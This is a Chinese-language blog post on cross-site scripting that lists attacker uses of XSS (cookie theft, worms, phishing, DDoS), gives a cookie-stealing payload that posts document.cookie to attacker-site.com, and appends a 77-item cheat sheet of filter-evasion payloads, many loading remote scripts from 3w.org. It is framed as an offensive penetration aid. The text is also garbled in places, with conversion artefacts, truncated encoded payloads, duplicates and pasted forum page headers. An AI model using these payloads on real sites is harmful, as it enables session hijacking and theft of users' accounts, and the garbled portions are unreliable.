Atitit. Xss 漏洞的原理and應用xss木馬

Atitit. Xss 漏洞的原理and應用xss木馬javascript

 

1XSS漏洞1php

2XSS的用途2css

2.1. 盜取cookie2html

2.2. 刷新流量 刷分3java

2.3. DOS 竊取隱私」、「假冒身份」、「WEB蠕蟲3git

2.4. 廣告植入 彈窗 、信息收集 、流量轉發 甚至是路由劫持3web

2.5. 魚攻擊,高級的釣魚技巧。3sql

2.6. 刪除目標文章、惡意篡改數據、嫁禍。3shell

2.7. 劫持用戶Web行爲,甚至進一步滲透內網。3express

2.8. 爆發Web2.0蠕蟲。3

2.9. 蠕蟲式的DDoS攻擊。3

2.10. 蠕蟲式掛馬攻擊、刷廣告、刷瀏量、破壞網上數據。。3

2.11. 1)協助csrf3

2.12. 2)收集用戶信息。3

2.13. xss搞一些論壇作營銷推廣個人東西...3

2.14. 有郵箱的xss漏洞,能夠經過郵件直接xss3

33、XSS分類4

4Xss木馬4

4.1. xss的優點 xss的弊端4

5瑞福5

6附常見的XSS攻擊方法5

 

1. XSS漏洞

跨站腳本攻擊縮寫爲XSS。惡意攻擊者往Web頁面裏插入惡意Script代碼,當用戶瀏覽該頁之時,嵌入其中Web裏面的Script代碼會被執行

 

理論上,全部可輸入的地方沒有對輸入數據進行處理的話,都會存在XSS漏洞,漏洞的危害取決於攻擊代碼的威力,攻擊代碼也不侷限於script。

 

在整個web滲透過程當中,不少時候沒有路可走,也許XSS的出現就能打開局面。

在一些大型網站的時候,只要用的好,xss比sql注入還好用。不少sql注入,獲得的hash是解不出來的。而大部分網站都沒有http-only保護,xss可以發揮的淋漓盡致。
固然,xss不只僅是用於獲取cookie,但最經常使用的仍是獲取cookie。

而xss的話, 也是相比sql更爲有力的一種滲透方式

 

做者:: 綽號:老哇的爪子 ( 全名::Attilax Akbar Al Rapanui 阿提拉克斯 阿克巴 阿爾 拉帕努伊 ) 漢字名:艾龍,  EMAIL:1466519819@qq.com

轉載請註明來源: http://www.cnblogs.com/attilax/

 

2. XSS的用途

2.1. 盜取cookie

這時咱們用cookie和session解決狀態維護問題,當用戶首次登入時,服務器爲該用戶建立一個 session ID,同時向遊覽器傳送一個 cookie,cookie保存會話鏈接中用到的數據,session ID做爲會話標識,遊覽器後續的請求均基於該session ID。

 

攻擊者能夠提供一個攻擊連接,當用戶點擊該連接時,向攻擊者本身的服務器發送一條保存有用戶session ID的信息,這樣就能夠竊取到用戶的session ID,獲得用戶的執行權限。

 

2.2. 刷新流量 刷分

2.3. DOS 竊取隱私」、「假冒身份」、「WEB蠕蟲

2.4. 廣告植入 彈窗 、信息收集 、流量轉發 甚至是路由劫持

2.5. 魚攻擊,高級的釣魚技巧。

2.6. 刪除目標文章、惡意篡改數據、嫁禍。

2.7. 劫持用戶Web行爲,甚至進一步滲透內網。

2.8. 爆發Web2.0蠕蟲。

2.9. 蠕蟲式的DDoS攻擊。

2.10. 蠕蟲式掛馬攻擊、刷廣告、刷瀏量、破壞網上數據。。

2.11.  1)協助csrf

2.12. 2)收集用戶信息。

2.13. xss搞一些論壇作營銷推廣個人東西...

2.14. 有郵箱的xss漏洞,能夠經過郵件直接xss

這個更爲直接,試想一下,當你郵箱收到一封郵件,當你打開的時候,在另外一個地方,別人用着你的信息訪問了你的郵箱,若是你的郵箱不是看完就刪的話,是多麼恐怖的意見事情

3.  3、XSS分類

XSS有三類:反射型XSS(非持久型)、存儲型XSS(持久型)和DOM XSS。

一、反射型XSS

發出請求時,XSS代碼出如今URL中,做爲輸入提交到服務器端,服務器端解析後響應,XSS代碼隨響應內容一塊兒傳回給瀏覽器,最後瀏覽器解析執行XSS代碼。這個過程像一次反射,故叫反射型XSS。

 

4. Xss木馬

首先,攻擊者以一個普通用戶登陸進來,而後在輸入框中提交如下數據:

<href=# onclick=\"document.location=\'http://attacker-site.com/xss.php?c=\'+escape\(document.cookie\)\;\">bangerlee</a>

4.1. xss的優點 xss的弊端 


1.侷限性太大,由於只侷限於客戶端,又受限於javascript的權限,幹不了太多事情,除非有0day,或者調用ActiveX作些壞事。
2.被動攻擊。XSS屬於被動攻擊,一封精心構造的郵件發發過去,別人一天不點,你就要等一天,萬一遇到對方休個產假,那就歇菜了。
xss的優點,也是它火的緣由:
1.攻擊成本並不高。自從有了各類xss平臺,瀏覽着網站,好好的,隨手就是一個盲打,根本停不下來,雖然收益有限,但成本很低,所以性價比很高。
2.不易被檢測。存儲型的XSS是很難被檢測到的,即使是payload中的某個關鍵字觸發了防護規則,也很容易變換繞過。
3.目前互聯網上xss漏洞仍是比較多的,想要發現並不難。之後就很差說了。



做者:菜客
連接:http://www.zhihu.com/question/24918141/answer/29484297
來源:知乎
著做權歸做者全部。商業轉載請聯繫做者得到受權,非商業轉載請註明出處。

 

5. 瑞福

 

xss攻擊入門 - bangerlee - 博客園.htm

XSS攻擊及防護 高爽 Coder - 博客頻道 - CSDN.NET.htm

XSS攻擊常識及常見的XSS攻擊腳本彙總 推酷.htm

 

 

6. 附常見的XSS攻擊方法 

 

(1)普通的XSS JavaScript注入

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG標籤XSS使用JavaScript命令

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG標籤無分號無引號

<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG標籤大小寫不敏感

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)HTML編碼(必須有分號)

<IMG SRC=javascript:alert(「XSS」)>

(6)修正缺陷IMG標籤

<IMG 「」"><SCRIPT>alert(「XSS」)</SCRIPT>」>

(7)formCharCode標籤(計算器)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode編碼(計算器)

<IMG SRC=jav..省略..S')>

(9)7位的UTF-8的Unicode編碼是沒有分號的(計算器)

<IMG SRC=jav..省略..S')>

(10)十六進制編碼也是沒有分號(計算器)

<IMG SRC=java..省略..XSS')>

(11)嵌入式標籤,將Javascript分開

<IMG SRC=」jav ascript:alert(‘XSS’);」>

(12)嵌入式編碼標籤,將Javascript分開

<IMG SRC=」jav ascript:alert(‘XSS’);」>

(13)嵌入式換行符

<IMG SRC=」jav ascript:alert(‘XSS’);」>

(14)嵌入式回車

<IMG SRC=」jav ascript:alert(‘XSS’);」>

(15)嵌入式多行注入JavaScript,這是XSS極端的例子

<IMG SRC=」javascript:alert(‘XSS‘)」>

(16)解決限制字符(要求同頁面)

<script>z=’document.’</script>

<script>z=z+’write(「‘</script>

<script>z=z+’<script’</script>

<script>z=z+’ src=ht’</script>

<script>z=z+’tp://ww’</script>

<script>z=z+’w.shell’</script>

<script>z=z+’.net/1.’</script>

<script>z=z+’js></sc’</script>

<script>z=z+’ript>」)’</script>

<script>eval_r(z)</script>

(17)空字符12-7-1 T00LS - Powered by Discuz! Board

https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6

perl -e ‘print 「<IMG SRC=java\0script:alert(\」XSS\」)>」;’ > out

(18)空字符2,空字符在國內基本沒效果.由於沒有地方能夠利用

perl -e ‘print 「<SCR\0IPT>alert(\」XSS\」)</SCR\0IPT>」;’ > out

(19)Spaces和meta前的IMG標籤

<IMG SRC=」 javascript:alert(‘XSS’);」>

(20)Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=」http://3w.org/XSS/xss.js」></SCRIPT>

(21)Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(「XSS」)>

(22)Non-alpha-non-digit XSS to 3

<SCRIPT/SRC=」http://3w.org/XSS/xss.js」></SCRIPT>

(23)雙開括號

<<SCRIPT>alert(「XSS」);//<</SCRIPT>

(24)無結束腳本標記(僅火狐等瀏覽器)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25)無結束腳本標記2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)半開的HTML/JavaScript XSS

<IMG SRC=」javascript:alert(‘XSS’)」

(27)雙開角括號

<iframe src=http://3w.org/XSS.html <

(28)無單引號 雙引號 分號

<SCRIPT>a=/XSS/

alert(a.source)</SCRIPT>

(29)換碼過濾的JavaScript

\」;alert(‘XSS’);//

(30)結束Title標籤

</TITLE><SCRIPT>alert(「XSS」);</SCRIPT>

(31)Input Image

<INPUT SRC=」javascript:alert(‘XSS’);」>

(32)BODY Image

<BODY BACKGROUND=」javascript:alert(‘XSS’)」>

(33)BODY標籤

<BODY(‘XSS’)>

(34)IMG Dynsrc

<IMG DYNSRC=」javascript:alert(‘XSS’)」>

(35)IMG Lowsrc

<IMG LOWSRC=」javascript:alert(‘XSS’)」>

(36)BGSOUND

<BGSOUND SRC=」javascript:alert(‘XSS’);」>

(37)STYLE sheet

<LINK REL=」stylesheet」 HREF=」javascript:alert(‘XSS’);」>

(38)遠程樣式表

<LINK REL=」stylesheet」 HREF=」http://3w.org/xss.css」>

(39)List-style-image(列表式)

<STYLE>li {list-style-image: url(「javascript:alert(‘XSS’)」);}</STYLE><UL><LI>XSS

(40)IMG VBscript

<IMG SRC=’vbscript:msgbox(「XSS」)’></STYLE><UL><LI>XSS

(41)META連接url

<META HTTP-EQUIV=」refresh」 CONTENT=」0;

URL=http://;URL=javascript:alert(‘XSS’);」>

(42)Iframe

<IFRAME SRC=」javascript:alert(‘XSS’);」></IFRAME>

(43)Frame

<FRAMESET><FRAME SRC=」javascript:alert(‘XSS’);」></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board

https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6

(44)Table

<TABLE BACKGROUND=」javascript:alert(‘XSS’)」>

(45)TD

<TABLE><TD BACKGROUND=」javascript:alert(‘XSS’)」>

(46)DIV background-image

<DIV STYLE=」background-image: url(javascript:alert(‘XSS’))」>

(47)DIV background-image後加上額外字符(1-32&34&39&160&8192-

8&13&12288&65279)

<DIV STYLE=」background-image: url(javascript:alert(‘XSS’))」>

(48)DIV expression

<DIV STYLE=」width: expression_r(alert(‘XSS’));」>

(49)STYLE屬性分拆表達

<IMG STYLE=」xss:expression_r(alert(‘XSS’))」>

(50)匿名STYLE(組成:開角號和一個字母開頭)

<XSS STYLE=」xss:expression_r(alert(‘XSS’))」>

(51)STYLE background-image

<STYLE>.XSS{background-image:url(「javascript:alert(‘XSS’)」);}</STYLE><A

CLASS=XSS></A>

(52)IMG STYLE方式

exppression(alert(「XSS」))’>

(53)STYLE background

<STYLE><STYLE

type=」text/css」>BODY{background:url(「javascript:alert(‘XSS’)」)}</STYLE>

(54)BASE

<BASE HREF=」javascript:alert(‘XSS’);//」>

(55)EMBED標籤,你能夠嵌入FLASH,其中包涵XSS

<EMBED SRC=」http://3w.org/XSS/xss.swf」 ></EMBED>

(56)在flash中使用ActionScrpt能夠混進你XSS的代碼

a=」get」;

b=」URL(\」";

c=」javascript:」;

d=」alert(‘XSS’);\」)」;

eval_r(a+b+c+d);

(57)XML namespace.HTC文件必須和你的XSS載體在一臺服務器上

<HTML xmlns:xss>

<?import namespace=」xss」 implementation=」http://3w.org/XSS/xss.htc」>

<xss:xss>XSS</xss:xss>

</HTML>

(58)若是過濾了你的JS你能夠在圖片裏添加JS代碼來利用

<SCRIPT SRC=」」></SCRIPT>

(59)IMG嵌入式命令,可執行任意命令

<IMG SRC=」http://www.XXX.com/a.php?a=b」>

(60)IMG嵌入式命令(a.jpg在同服務器)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)繞符號過濾

<SCRIPT a=」>」 SRC=」http://3w.org/xss.js」></SCRIPT>

(62)

<SCRIPT =」>」 SRC=」http://3w.org/xss.js」></SCRIPT>

(63)

<SCRIPT a=」>」 」 SRC=」http://3w.org/xss.js」></SCRIPT>

(64)

<SCRIPT 「a=’>’」 SRC=」http://3w.org/xss.js」></SCRIPT>

(65)

<SCRIPT a=`>` SRC=」http://3w.org/xss.js」></SCRIPT>

(66)12-7-1 T00LS - Powered by Discuz! Board

https://www.t00ls.net/viewthread.php?action=printable&tid=15267 4/6

<SCRIPT a=」>’>」 SRC=」http://3w.org/xss.js」></SCRIPT>

(67)

<SCRIPT>document.write(「<SCRI」);</SCRIPT>PT SRC=」http://3w.org/xss.js」>

</SCRIPT>

(68)URL繞行

<A HREF=」http://127.0.0.1/」>XSS</A>

(69)URL編碼

<A HREF=」http://3w.org」>XSS</A>

(70)IP十進制

<A HREF=」http://3232235521″>XSS</A>

(71)IP十六進制

<A HREF=」http://0xc0.0xa8.0×00.0×01″>XSS</A>

(72)IP八進制

<A HREF=」http://0300.0250.0000.0001″>XSS</A>

(73)混合編碼

<A HREF=」h

tt p://6 6.000146.0×7.147/」">XSS</A>

(74)節省[http:] <A HREF=」//www.google.com/」>XSS</A>

(75)節省[www] <A HREF=」http://google.com/」>XSS</A>

(76)絕對點絕對DNS

<A HREF=」http://www.google.com./」>XSS</A>

(77)javascript連接

<A HREF=」javascript:document.location=’http://www.google.com/’」>XSS</A>

相關文章
相關標籤/搜索